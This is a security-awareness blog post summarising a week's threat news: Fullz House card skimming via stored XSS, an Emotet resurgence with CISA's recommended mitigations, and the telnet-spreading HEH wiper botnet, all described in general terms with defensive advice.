Cybersecurity Week in Review: 10/5
Posted by: GuidePoint Security
Welcome to week two of October, and yes, it is still Cybersecurity Awareness Month. Just because we are a little more aware doesn’t mean attacks have slowed down. As with every week, I’ve compiled a list of some of the events, trends, and new things to watch out for over the last seven days that were interesting in cybersecurity. Let’s dive in and look at some of the notable things that have happened over the previous week.
Fullz House, No Not the Show!
A few weeks back, we talked a little about Magecart and the new style of e-commerce attack. These types of attacks involve injecting malicious code into a company’s website or platform. From there, the code works like a skimmer to siphon off credit card information and is sent back to the attacker. If you think about the physical version of this attack style, card skimmers are a very similar concept but use a different delivery.
Recently, a group named Fullz House has been identified placing malicious code on websites to steal people’s payment information, according to an article by ThreatPost. Fullz House gets their name from the underground slang term “fullz,” which means a full set of individuals PII (personally identifiable information) and financial data. The malicious code gets injected, usually via a vulnerable field that accepts input like a search bar or via changing links on the page. Once the payload is in the database, the code can be loaded repeatedly. This is what we would consider a persistent or stored XSS (Cross-Site Scripting) attack. Non-Persistent XSS attacks are common, but these attack types don’t store code on the webserver and rely on manipulated links. In many instances, these XSS vulnerabilities can be tricky to find on your website and even more problematic to patch or fix since the reason it is allowed deals directly with the way your website was developed.
Fullz House, in their recent attack of a mobile provider, used a Base64 encoded string containing the malicious javascript. Once they injected the code into the webpage, the page interpreted the data given, loaded a fake Google Analytics script that checks for input fields and steals the data entered, and provided it back to the attack group. However, the skimmer code is easily detected because it starts exfiltration activities every time the input field data changes. The researchers point out that if you are watching the network data, you see each leak happening via a GET request every time the code is run.
Fullz House attack group is not new to the card skimming scene via websites, but they are more innovative than their counterparts. The big difference with Fullz is that they incorporate phishing with their skimming tactics. Once they have a person’s information, they sell it on one of their stores like BlueMagicStore for stolen PII via phishing techniques, and CardHouse where they sell credit-card data from their skimming endeavors.
Read the full article here.
Emotet Alert!
It feels like Emotet is always popping up in waves since it was first discovered back in 2014. We talked about Emotet back in the second week of September, where it was found in multiple countries including France, New Zealand and Japan. This pesky banking trojan seems to make headlines and wreak havoc constantly.
As you probably guessed, Emotet is resurging again in the United States according to an alert released by CISA (Cybersecurity and Infrastructure Security Agency) and MS-ISAC (Multi-State Information Sharing & Analysis Center). In the alert, it is stated that activity has been on the rise since July of this year. In the timeline of events, we can see a surge of activity in February 2020 that showed COVID-19-themed phishing emails designed to lure victims into downloading the malware but mostly targeting non-U.S. countries. In July, those same indicators were found in phishing attacks targeted at U.S. businesses using the same COVID-19 theme.
In August, things got worse. The data shows that there was a one thousand percent increase in downloads of Emotet. Thankfully, antivirus firms adjusted their heuristics to detect the new information which led to a decrease in downloads.
Now into September, where we started hearing more and more about Emotet surging in other countries outside the United States, researchers found that the campaigns were switching tactics again. The attackers began to use password-protected archive files as attachments to bypass email security. Further, they identified thread hijacking instances, which is a tactic where an attacker steals an email chain from an infected host and replies within the thread to make it seem legitimate and attaches the malware.
To mitigate these attacks and keep users from downloading Emotet and other malware, CISA and MS-ISAC recommend applying certain best practices to strengthen security posture. Some of these practices include:
- Blocking email attachments commonly associated with malware (e.g.,.dll and .exe)
- Blocking email attachments that cannot be scanned by antivirus software (e.g., .zip files)
- Implementing an antivirus program and a formalized patch management process.
- Adhering to the principle of least privilege
- Segmenting and segregating networks and functions
- Maintaining situational awareness of the latest threats and implement appropriate access control lists
- Scanning for and removing suspicious email attachments; ensuring the scanned attachment is its “true file type” (i.e., the extension matches the file header)
To get more best practices and IOC’s (indicators of compromise), along with MITRE ATT&CK techniques used by Emotet, check out the full alert here.
Wiper malware…No Good.
Many of us have used telnet for simple and complex tasks over the years. I know I used it about 2 hours ago to make some adjustments to my router. For those who don’t know, telnet is a network protocol used for bidirectional text-oriented communication between two machines. In layman’s terms, it is used for remote communication between network-connected devices. Now, as with any type of command language or protocol, it can be used for good and evil. Since it allows the sending and receiving of data, it can be used to load and deploy malicious code over a connection, whether local or over the internet, depending on how your firewall and network peripherals are set up.
Recently, a new botnet, HEH, was discovered by research firms and found seeking any device that had ports 23 and 2323 (standard telnet ports) open and telnet enabled, according to Threat Post. The even more disturbing part of this malware is that it has been found on multiple CPU architectures, including x86(32/64 bit), ARM (32/64 bit), MIPS (MIPS32/MIPS-III), and PPC. This boils down to the malware showing up on desktops, laptops, mobile and IoT (internet-of-things) devices.
The botnet looks to gain access to the devices by brute-forcing the telnet credentials. Once it completes this process and gains a foothold, it will infect the device with a Golang (Go Programming Language) binary that establishes communication with other bot nodes using P2P (peer-to-peer). Golang has been around since 2009 but has recently started gaining popularity with IoT, especially IoT malware authors.
This specific botnet gets its name, HEH, from phrasing inside the code, and consists of three function modules: a Propagation module, a local HTTP service module and the P2P module. It has a wide range of commands and options once installed and running. This doesn’t differ all that much from other botnets, except for command number eight, SelfDestruct. This command, when executed, wipes out everything on the host disks. This type of attack is called a wiper and usually is used for targeting critical infrastructure and nation-state attacks. This is the part of the bot that makes it stand out above the rest.
Though it is a dangerous bot, the ability to stop the attack is not so complicated. People can protect themselves by ensuring that ports 23 and 2323 are not open to the public internet and ensure strong passwords are implemented on all devices.
Read the article here.
Final Words
With this being Cybersecurity Awareness Month, I felt it essential to discuss some of the things we need to stay aware of. With all the crazy things happening daily in our cyber lives, it can be easy to forget our basics and forget why we need them. I’ve never worked in an industry that moves as quickly as the cybersecurity industry does. Technology changes daily, and many times, the recommendations and configuration options change with it. There is a constant hustle to the work, and I’m here to remind myself and you – let’s slow down for a minute. Remember that adequate security takes considering our vulnerabilities at all angles, including the easily forgotten vulnerability… ourselves.
Whether we are implementing a website from the ground up, setting up our IoT devices, or something as simple as opening an email from a colleague, we have to keep security at the forefront of our minds. We have to slow down and think about what we are doing and why we are doing it. Will there be an adverse reaction to this simple password? Could leaving this port open cause me problems down the road? Why did Jim email me an attachment at 2 AM on a work email chain from 3 months ago?
Thinking about this past week, I can’t stop hearing the tortoise from the old children’s story, “Slow and steady wins the race”. No matter your role in a company, you can contribute to its security strength or contribute to its weakness. So let’s all remember to stay informed, stay aware and stay safe.
As always, security is an action. We get out what we put into it.